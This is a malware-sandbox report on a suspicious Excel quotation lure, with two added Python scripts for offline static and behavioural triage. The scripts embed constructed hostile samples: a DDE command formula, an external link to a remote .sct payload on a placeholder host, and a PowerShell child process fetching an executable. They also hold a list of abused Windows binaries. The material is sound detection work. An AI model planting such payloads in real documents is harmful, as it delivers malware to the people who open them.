File name: Solicitud de cotizaciòn..xlsx (Spanish, "request for quotation"; note the doubled dot before the extension)
Full analysis: https://app.any.run/tasks/a7ed4b30-3199-425f-a958-787c2b10a6c1
Verdict: Malicious activity
Analysis date: December 05, 2022, 18:15:51
OS: Windows 10 Professional (build: 19044, 64 bit)
MIME: application/vnd.openxmlformats-officedocument.spreadsheetml.sheet
File info: Microsoft Excel 2007+
MD5: CD9567E232B722B34985981E32633321
SHA1: 3B1FDB9DACD8A1F20FDC0F03D2088855924452A7
SHA256: 7AE8B3795F2EFFF6E153B1290633C327A5D3ADE19F40ECC0A891579ED5587C61
SSDEEP: 24576:Cmv7PSn7ViMIY4oSX6fM1lPH/VE+njnkLQp:CmMVHfSlPHJngEp
ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS
    No malicious indicators.
  • SUSPICIOUS
    • Reads settings of System Certificates
      • SLUI.exe (PID: 2496)
      • slui.exe (PID: 2416)
    • Process requests binary or script from the Internet
      • EXCEL.EXE (PID: 2888)
  • INFO
    • Checks proxy server information
      • EXCEL.EXE (PID: 2888)
      • slui.exe (PID: 2416)
    • Reads the software policy settings
      • slui.exe (PID: 2416)
      • SLUI.exe (PID: 2496)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD (file type identification, with confidence):
  .xlsx | Excel Microsoft Office Open XML Format document (61.2%)
  .zip | Open Packaging Conventions container (31.5%)
  .zip | ZIP compressed archive (7.2%)
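The TRiD result above says what the sample is at the byte level: an Office Open XML workbook is an OPC package, i.e. a ZIP archive of XML parts, so the first thing to do before (or instead of) detonation is to open it as a ZIP and look at what it carries. The script below is an added example for this report, not ANY.RUN's tooling. It confirms the container type, checks the file's hashes against the values the report publishes, and enumerates the OPC parts that turn a spreadsheet into a dropper: a VBA project, Excel 4.0 macro sheets, embedded objects, relationships with TargetMode="External", and DDE formulas in sheet XML. The workbook produced by build_sample() is constructed in memory for demonstration; it is not the file from the report, so its hashes will not match the report's, and the http://example.invalid target inside it is a placeholder.

```python
"""Offline static triage of an Office Open XML (.xlsx) sample.

Added example, not ANY.RUN's own tooling. build_sample() produces a
CONSTRUCTED workbook for demonstration; it is not the reported file.
"""
import hashlib
import io
import re
import xml.etree.ElementTree as ET
import zipfile

ZIP_MAGIC = b"PK\x03\x04"
OLE_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"   # legacy OLE2 (.xls/.doc) signature

# Sheet XML stores a DDE formula as <f>server|topic!item</f>,
# e.g. <f>cmd|'/c calc.exe'!A0</f>; this matches that generic shape.
DDE_FORMULA = re.compile(r"<f>([^<]*\|[^<]*![^<]*)</f>")


def file_hashes(data: bytes) -> dict:
    """MD5/SHA1/SHA256 in the upper-case hex form the report uses."""
    return {name: hashlib.new(name, data).hexdigest().upper()
            for name in ("md5", "sha1", "sha256")}


def verify_hashes(data: bytes, expected: dict) -> dict:
    """Compare computed hashes with report values; True means a match."""
    actual = file_hashes(data)
    return {name: actual[name] == value.upper() for name, value in expected.items()}


def container_type(data: bytes) -> str:
    if data.startswith(ZIP_MAGIC):
        return "zip"        # OOXML/OPC package, as TRiD reported for this sample
    if data.startswith(OLE_MAGIC):
        return "ole"        # an OLE2 file carrying an .xlsx extension is itself a red flag
    return "unknown"


def triage_ooxml(data: bytes) -> dict:
    """Enumerate OPC parts and flag those that can carry executable content."""
    f = {"container": container_type(data), "parts": [], "vba": False,
         "xlm_macros": False, "embeddings": [], "external_targets": [],
         "dde_formulas": []}
    if f["container"] != "zip":
        return f
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in zf.namelist():
            f["parts"].append(name)
            low = name.lower()
            if low == "xl/vbaproject.bin":
                f["vba"] = True                       # VBA project present
            elif low.startswith("xl/macrosheets/"):
                f["xlm_macros"] = True                # Excel 4.0 (XLM) macro sheet
            elif low.startswith("xl/embeddings/"):
                f["embeddings"].append(name)          # embedded OLE/package object
            if low.endswith(".rels"):
                # TargetMode="External" relationships point outside the package
                # (remote templates, external oleObject targets, external links).
                for el in ET.fromstring(zf.read(name)).iter():
                    if el.attrib.get("TargetMode") == "External":
                        f["external_targets"].append(el.attrib.get("Target", ""))
            elif low.startswith("xl/worksheets/") and low.endswith(".xml"):
                text = zf.read(name).decode("utf-8", "replace")
                f["dde_formulas"].extend(DDE_FORMULA.findall(text))
    return f


def risk_score(f: dict) -> int:
    """Number of independent static risk signals; 0 means nothing stood out."""
    return sum([f["vba"], f["xlm_macros"], bool(f["embeddings"]),
                bool(f["external_targets"]), bool(f["dde_formulas"])])


def build_sample(hostile: bool) -> bytes:
    """CONSTRUCTED minimal .xlsx; hostile=True adds a DDE formula and an external oleObject link."""
    rels = "http://schemas.openxmlformats.org/package/2006/relationships"
    main = "http://schemas.openxmlformats.org/spreadsheetml/2006/main"
    formula = "<f>cmd|'/c calc.exe'!A0</f>" if hostile else "<f>SUM(A1:A2)</f>"
    sheet_rels = f'<Relationships xmlns="{rels}"/>'
    if hostile:  # placeholder target, not an indicator from the report
        sheet_rels = (f'<Relationships xmlns="{rels}"><Relationship Id="rId1" '
                      'Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" '
                      'Target="http://example.invalid/payload.sct" TargetMode="External"/></Relationships>')
    parts = {
        "[Content_Types].xml": '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>',
        "_rels/.rels": f'<Relationships xmlns="{rels}"/>',
        "xl/workbook.xml": f'<workbook xmlns="{main}"/>',
        "xl/worksheets/sheet1.xml": (f'<worksheet xmlns="{main}"><sheetData><row r="1">'
                                     f'<c r="A1">{formula}<v>0</v></c></row></sheetData></worksheet>'),
        "xl/worksheets/_rels/sheet1.xml.rels": sheet_rels,
    }
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, body in parts.items():
            # fixed timestamp so the constructed sample is byte-for-byte reproducible
            zf.writestr(zipfile.ZipInfo(name, date_time=(2022, 12, 5, 18, 15, 51)), body)
    return buf.getvalue()
```

Run triage_ooxml() on the real file and compare file_hashes() with the MD5/SHA1/SHA256 above before trusting any conclusion drawn from the report; a hash mismatch means you are looking at a different artifact than the one that was detonated. A score of 0 from risk_score() is not a clean bill of health (a plain .xlsx can still deliver an exploit or a phishing link), but any non-zero signal deserves a look before the file is opened anywhere outside a sandbox.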
Total processes: 133
Monitored processes: 6
Malicious processes: 3
Suspicious processes: 1

Behavior graph (monitored processes in order of appearance; "no specs" means the sandbox recorded no details for that process):
  excel.exe, sppextcomobj.exe (no specs), slui.exe, filecoauth.exe (no specs), filecoauth.exe (no specs), slui.exe

Process information

PID 2888: EXCEL.EXE
CMD: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\admin\Desktop\Solicitud de cotizaciòn..xlsx"
Path: C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
Parent process: Explorer.EXE
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Microsoft Excel
Version: 16.0.12026.20264
Modules (loaded images):
c:\program files\microsoft office\root\office16\excel.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\ole32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\combase.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\win32u.dll
PID 6096: SppExtComObj.exe
CMD: C:\WINDOWS\system32\SppExtComObj.exe -Embedding
Path: C:\WINDOWS\system32\SppExtComObj.exe
Parent process: svchost.exe
User: NETWORK SERVICE
Company: Microsoft Corporation
Integrity Level: SYSTEM
Description: KMS Connection Broker
Exit code: 0
Version: 10.0.19041.1202 (WinBuild.160101.0800)
Modules (loaded images):
c:\windows\system32\sppextcomobj.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
PID 2496: SLUI.exe
CMD: "C:\WINDOWS\System32\SLUI.exe" RuleId=3482d82e-ca2c-4e1f-8864-da0267b484b2;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c;NotificationInterval=1440;Trigger=TimerEvent
Path: C:\WINDOWS\System32\SLUI.exe
Parent process: SppExtComObj.exe
User: NETWORK SERVICE
Company: Microsoft Corporation
Integrity Level: SYSTEM
Description: Windows Activation Client
Exit code: 1
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (loaded images):
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
PID 5604: FileCoAuth.exe
CMD: C:\Users\admin\AppData\Local\Microsoft\OneDrive\19.043.0304.0013\FileCoAuth.exe -Embedding
Path: C:\Users\admin\AppData\Local\Microsoft\OneDrive\19.043.0304.0013\FileCoAuth.exe
Parent process: svchost.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Microsoft OneDrive File Co-Authoring Executable
Exit code: 0
Version: 19.043.0304.0013
Modules (loaded images):
c:\users\admin\appdata\local\microsoft\onedrive\19.043.0304.0013\filecoauth.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\user32.dll
c:\windows\syswow64\win32u.dll
PID 4188: FileCoAuth.exe
CMD: C:\Users\admin\AppData\Local\Microsoft\OneDrive\19.043.0304.0013\FileCoAuth.exe -Embedding
Path: C:\Users\admin\AppData\Local\Microsoft\OneDrive\19.043.0304.0013\FileCoAuth.exe
Parent process: svchost.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Microsoft OneDrive File Co-Authoring Executable
Exit code: 0
Version: 19.043.0304.0013
Modules (loaded images):
c:\users\admin\appdata\local\microsoft\onedrive\19.043.0304.0013\filecoauth.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\user32.dll
c:\windows\syswow64\win32u.dll
PID 2416: slui.exe
CMD: C:\WINDOWS\System32\slui.exe -Embedding
Path: C:\WINDOWS\System32\slui.exe
Parent process: svchost.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Activation Client
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (loaded images):
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
Total events: 11 448 (read: 11 240, write: 0, delete: 0)

Modification events: no data

Dropped files by type: executable 0, suspicious 9, text 3, unknown types 2

Dropped files

PID 2888 (EXCEL.EXE): C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\Solicitud de cotizaciòn..xlsx.LNK (lnk)
  MD5: F0B77DDCF9B3DEC544184F523AA95240
  SHA256: E7B1BF3B2E75B0EC19E4C9B0B4EE80D8084B7CDADC3065AE771F61DD93D64323
PID 2888 (EXCEL.EXE): C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat (ini)
  MD5: A2CB95355DE5394796E2AF7C5CC7ECF4
  SHA256: F8F5E9FDF4CB865161E6BB8864E67B6E73C5EB050880FC51783658C268AB496B
PID 2888 (EXCEL.EXE): C:\Users\admin\AppData\Local\Temp\.ses (text)
  MD5: B53D0E2ABEB41FB3657AE78D88AABF8D
  SHA256: C6C82E5E7DD9BC7871D6E5B0F188438250FB61A537252DD0C4769123F47F5A78
PID 4188 (FileCoAuth.exe): C:\Users\admin\AppData\Local\Microsoft\OneDrive\logs\Common\FileCoAuth-2022-12-05.1818.4188.1.odl (binary)
  MD5: 90BCB1099FD0E24AB8C78F51F1BE926A
  SHA256: 7B437457486B486A5E4BD4BFAEC352E5418A132DD20FFFBE03109879C25AF4C1
PID 5604 (FileCoAuth.exe): C:\Users\admin\AppData\Local\Microsoft\OneDrive\logs\Common\FileCoAuth-2022-12-05.1818.5604.1.odl (binary)
  MD5: C0005BFDE850EEEBCA7958CF20B24E36
  SHA256: AD973165C34D551FB3618D0EE34DC6B32A876D1E45324ECA20CF8B54568EE9D7
PID 2888 (EXCEL.EXE): C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\4VA93XNAVBMIOECWAWBI.temp (binary)
  MD5: 4FCB2A3EE025E4A10D21E1B154873FE2
  SHA256: 90BF6BAA6F968A285F88620FBF91E1F5AA3E66E2BAD50FD16F37913280AD8228
PID 2888 (EXCEL.EXE): C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms~RF10908a.TMP (binary)
  MD5: 4FCB2A3EE025E4A10D21E1B154873FE2
  SHA256: 90BF6BAA6F968A285F88620FBF91E1F5AA3E66E2BAD50FD16F37913280AD8228
PID 4188 (FileCoAuth.exe): C:\Users\admin\AppData\Local\Microsoft\OneDrive\logs\Common\FileCoAuth-2022-12-05.1818.4188.1.aodl (binary)
  MD5: 923BF0E545D9C37CA8874C8D6C4A30E6
  SHA256: AB32C675D35DDBEBFCF8B11720C3E550024E8D0DF557838F17186377E3D0FE65
PID 2888 (EXCEL.EXE): C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\F9OGI6VYLGWI11T5LI8T.temp (binary)
  MD5: E4A1661C2C886EBB688DEC494532431C
  SHA256: B76875C50EF704DBBF7F02C982445971D1BBD61AEBE2E4B28DDC58A1D66317D5
PID 5604 (FileCoAuth.exe): C:\Users\admin\AppData\Local\Microsoft\OneDrive\logs\Common\FileCoAuth-2022-12-05.1818.5604.1.aodl (binary)
  MD5: 923BF0E545D9C37CA8874C8D6C4A30E6
  SHA256: AB32C675D35DDBEBFCF8B11720C3E550024E8D0DF557838F17186377E3D0FE65
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests: 71
TCP/UDP connections: 88
DNS requests: 50
Threats: 0

HTTP requests ("-" = not recorded)

PID | Process | Method | HTTP code | IP:port | URL | CN | Type | Size | Reputation
2888 | EXCEL.EXE | GET | 200 | 13.107.42.16:443 | https://config.edge.skype.com/config/v2/Office/excel/16.0.12026.20264/Production/CC?&Clientid=%7bD61AB268-C26A-439D-BB15-2A0DEDFCA6A3%7d&Application=excel&Platform=win32&Version=16.0.12026.20264&MsoVersion=16.0.12026.20194&Audience=Production&Build=ship&Architecture=x64&Language=en-US&SubscriptionLicense=false&PerpetualLicense=2019&Channel=CC&InstallType=C2R&SessionId=%7bE7BA5CF1-A3E3-42A7-B538-2BB4252A395A%7d&LabMachine=false | US | text | 170 Kb | whitelisted
1700 | sihclient.exe | GET | 304 | 40.125.122.176:443 | https://slscr.update.microsoft.com/SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19044.1288/0?CH=686&L=en-US&P=&PT=0x30&WUA=10.0.19041.1288&MK=DELL&MD=DELL | US | - | - | whitelisted
2916 | svchost.exe | GET | - | 23.216.77.6:80 | http://crl.microsoft.com/pki/crl/products/MicTimStaPCA_2010-07-01.crl | US | - | - | whitelisted
1700 | sihclient.exe | GET | - | 72.246.169.155:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl | NL | - | - | whitelisted
1700 | sihclient.exe | GET | 200 | 2.19.126.97:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | DE | der | 1.11 Kb | whitelisted
1700 | sihclient.exe | GET | 200 | 23.216.77.6:80 | http://crl.microsoft.com/pki/crl/products/MicTimStaPCA_2010-07-01.crl | US | der | 555 b | whitelisted
1012 | svchost.exe | POST | 200 | 40.126.32.134:443 | https://login.live.com/RST2.srf | US | xml | 1.25 Kb | whitelisted
1700 | sihclient.exe | GET | - | 72.246.169.155:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Signing%20CA%202.2.crl | NL | - | - | whitelisted
1012 | svchost.exe | POST | 200 | 40.126.32.134:443 | https://login.live.com/RST2.srf | US | xml | 1.25 Kb | whitelisted
2916 | svchost.exe | GET | - | 88.221.169.152:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Signing%20CA%202.3.crl | unknown | - | - | whitelisted
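Read together, the process and HTTP sections above answer the two questions that decide whether an Office lure did anything: EXCEL.EXE (PID 2888) is the only process with Explorer.EXE as parent and spawned no children; SppExtComObj.exe/SLUI.exe (Windows activation) and FileCoAuth.exe (OneDrive) are children of svchost.exe, not of Excel; and the only HTTP request attributed to EXCEL.EXE goes to config.edge.skype.com, an Office configuration endpoint. The script below is an added example of that triage, not ANY.RUN's signature logic. It checks whether any Office process spawned a child (and whether that child is a living-off-the-land binary), and whether any Office process requested a payload-like file or contacted a host outside Microsoft's own service domains. REPORT_PROCS and REPORT_HTTP are transcribed from this page (query strings dropped; the HTTP list is a representative subset); the HOSTILE_* rows and the host example.invalid are constructed to show what a positive result looks like, and FIRST_PARTY is an assumed domain-suffix list, not an ANY.RUN allowlist.

```python
"""Triage of a sandbox process list and HTTP log for Office-driven activity.

Added example, not ANY.RUN's own logic. REPORT_* rows come from the
report on this page; HOSTILE_* rows are CONSTRUCTED; FIRST_PARTY is an
assumed list of Microsoft service domain suffixes.
"""
from posixpath import splitext
from urllib.parse import urlsplit

OFFICE = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe", "msaccess.exe"}
LOLBINS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
           "mshta.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe",
           "msiexec.exe", "bitsadmin.exe", "schtasks.exe"}
PAYLOAD_EXT = {".exe", ".dll", ".scr", ".ps1", ".vbs", ".js", ".hta", ".sct",
               ".bat", ".cmd", ".msi", ".zip", ".iso", ".lnk"}
# Assumed first-party suffixes for Office/Windows config, licensing and CRL traffic.
FIRST_PARTY = (".microsoft.com", ".office.com", ".office.net", ".live.com",
               ".skype.com", ".windows.com")

# (pid, image, parent image): the six monitored processes from the report.
REPORT_PROCS = [
    (2888, "EXCEL.EXE", "Explorer.EXE"),
    (6096, "SppExtComObj.exe", "svchost.exe"),
    (2496, "SLUI.exe", "SppExtComObj.exe"),
    (5604, "FileCoAuth.exe", "svchost.exe"),
    (4188, "FileCoAuth.exe", "svchost.exe"),
    (2416, "slui.exe", "svchost.exe"),
]
# (pid, image, method, url): a subset of the report's HTTP rows, query strings dropped.
REPORT_HTTP = [
    (2888, "EXCEL.EXE", "GET", "https://config.edge.skype.com/config/v2/Office/excel/16.0.12026.20264/Production/CC"),
    (1700, "sihclient.exe", "GET", "https://slscr.update.microsoft.com/SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19044.1288/0"),
    (2916, "svchost.exe", "GET", "http://crl.microsoft.com/pki/crl/products/MicTimStaPCA_2010-07-01.crl"),
    (1012, "svchost.exe", "POST", "https://login.live.com/RST2.srf"),
]
# CONSTRUCTED: what the same report would show if Excel had spawned
# PowerShell and pulled an executable from an unknown host.
HOSTILE_PROCS = REPORT_PROCS + [(4100, "powershell.exe", "EXCEL.EXE")]
HOSTILE_HTTP = REPORT_HTTP + [(2888, "EXCEL.EXE", "GET", "http://example.invalid/update/setup.exe")]


def office_children(procs):
    """Every child of an Office process; the trailing flag marks a LOLBin child."""
    return [(pid, image, parent, image.lower() in LOLBINS)
            for pid, image, parent in procs if parent.lower() in OFFICE]


def is_first_party(host: str) -> bool:
    """True when the host is one of the assumed Microsoft service domains (or a subdomain)."""
    host = host.lower()
    return host.endswith(FIRST_PARTY) or any(host == s[1:] for s in FIRST_PARTY)


def office_fetches(http):
    """Office-process requests that look like a payload download or leave first-party domains."""
    hits = []
    for pid, image, method, url in http:
        if image.lower() not in OFFICE:
            continue
        u = urlsplit(url)
        ext = splitext(u.path)[1].lower()
        reasons = []
        if not is_first_party(u.hostname or ""):
            reasons.append("third-party host")
        if ext in PAYLOAD_EXT:
            reasons.append("payload extension " + ext)
        if reasons:
            hits.append((pid, image, method, url, reasons))
    return hits


def triage(procs, http) -> dict:
    """Both checks together; empty lists mean the report shows no Office-driven activity."""
    return {"office_children": office_children(procs),
            "office_fetches": office_fetches(http)}
```

For the report's own rows both lists come back empty, which is consistent with the "No malicious indicators" signature section; the constructed rows show a LOLBin child and a third-party .exe fetch, the two signals that would justify the "Malicious activity" verdict on their own. The domain-suffix check is deliberately coarse: an attacker hosting on a Microsoft-owned service (SharePoint, OneDrive, Azure blob storage) passes it, so treat it as a noise filter for telemetry, not as proof of benign traffic.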

Connections ("-" = not recorded)

PID | Process | IP:port | Domain | ASN | CN | Reputation
2724 | svchost.exe | 40.113.103.199:443 | client.wns.windows.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted
- | - | 2.19.126.87:80 | crl.microsoft.com | Akamai International B.V. | DE | unknown
1012 | svchost.exe | 40.126.32.134:443 | - | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted
1700 | sihclient.exe | 40.125.122.176:443 | slscr.update.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | US | suspicious
2888 | EXCEL.EXE | 52.109.88.191:443 | officeclient.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted
2888 | EXCEL.EXE | 13.107.42.16:443 | config.edge.skype.com | MICROSOFT-CORP-MSN-AS-BLOCK | US | whitelisted
1700 | sihclient.exe | 2.19.126.97:80 | crl.microsoft.com | Akamai International B.V. | DE | suspicious
1700 | sihclient.exe | 2.19.126.87:80 | crl.microsoft.com | Akamai International B.V. | DE | unknown
2888 | EXCEL.EXE | 52.109.13.62:443 | nexusrules.officeapps.live.com | MICROSOFT-CORP-MSN-AS-BLOCK | US | suspicious
1700 | sihclient.exe | 88.221.169.152:80 | www.microsoft.com | AKAMAI-AS | DE | whitelisted

DNS requests (domain, resolved addresses, reputation)

officeclient.microsoft.com
  • 52.109.88.191
whitelisted
slscr.update.microsoft.com
  • 40.125.122.176
  • 52.152.110.14
whitelisted
crl.microsoft.com
  • 2.19.126.87
  • 2.19.126.97
  • 23.216.77.6
  • 23.216.77.28
  • 95.101.54.122
  • 95.101.54.128
whitelisted
www.microsoft.com
  • 88.221.169.152
  • 72.246.169.155
  • 23.3.109.244
  • 2.18.233.62
whitelisted
config.edge.skype.com
  • 13.107.42.16
whitelisted
nexusrules.officeapps.live.com
  • 52.109.13.62
whitelisted
self.events.data.microsoft.com
  • 13.69.239.72
  • 20.189.173.11
whitelisted
client.wns.windows.com
  • 40.113.110.67
  • 40.113.103.199
whitelisted
fe3cr.delivery.mp.microsoft.com
  • 40.77.2.164
  • 2603:1020:2:3::67
whitelisted
settings-win.data.microsoft.com
  • 51.124.78.146
  • 40.127.240.158
  • 4.231.128.59
  • 20.73.194.208
whitelisted

Threats (Suricata alerts; identical alerts collapsed with a count)

PID | Process | Class | Message | Count
3620 | svchost.exe | Misc activity | ET USER_AGENTS Microsoft Device Metadata Retrieval Client User-Agent | 9
3620 | svchost.exe | Misc activity | ET INFO Windows OS Submitting USB Metadata to Microsoft | 1

Debug info: none